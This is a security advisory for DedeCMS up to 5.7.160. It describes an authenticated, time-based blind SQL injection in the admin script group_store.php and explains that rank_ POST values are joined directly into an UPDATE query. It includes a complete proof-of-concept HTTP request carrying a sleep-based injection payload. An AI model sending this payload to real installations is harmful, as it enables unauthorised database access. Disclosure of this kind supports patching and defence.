DedeCMS-V5.7.160 with Backend Blind SQL injection in backend /dede/group_store.php.
Description
Admin backend group store blind SQL injection via post parameters.
Affected Version
DedeCMS <= 5.7.160
POC
Login to admin backend management.
Request to /dede/group_store.php with GET parameter action=uprank and POST parameters rank_1=1'+and+sleep(3)+and+'1, this payload will lead to a time-based SQL injection.
In the source code of /dede/group_store.php, when the GET parameter action is uprank, the POST value which the key contains rank_ will be directly joined into the update SQL statement, which lead to SQL update injection, finally the joint statement will be passed through mysqli_query, but this function only return boolean value when the query string is an update statement, that is why this is a blind injection.
Full POC request:
1 2 3 4 5 6 7 8 9 10 11 12 13
POST/cms/dedecms/dede/group_store.php?action=uprankHTTP/1.1 Host: 192.168.0.8 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=k5ten9v1ljuogh8pjae2idof0b; _csrf_name_273c7533=e59946ea73ad488a9da6a03897480ac5; _csrf_name_273c75331BH21ANI1AGD297L1FF21LN02BGE1DNG=6c93980ce4934236; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0462031c83e0ae08; DedeLoginTime=1677428501; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d9cb1c6293c6c17e; ENV_GOBACK_URL=%2Fcms%2Fdedecms%2Fdede%2Fgroup_store.php Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 29
rank_1=1'+and+sleep(3)+and+'1
Reference
Reported by Srpopty, vulnerability discovered by using Corax.
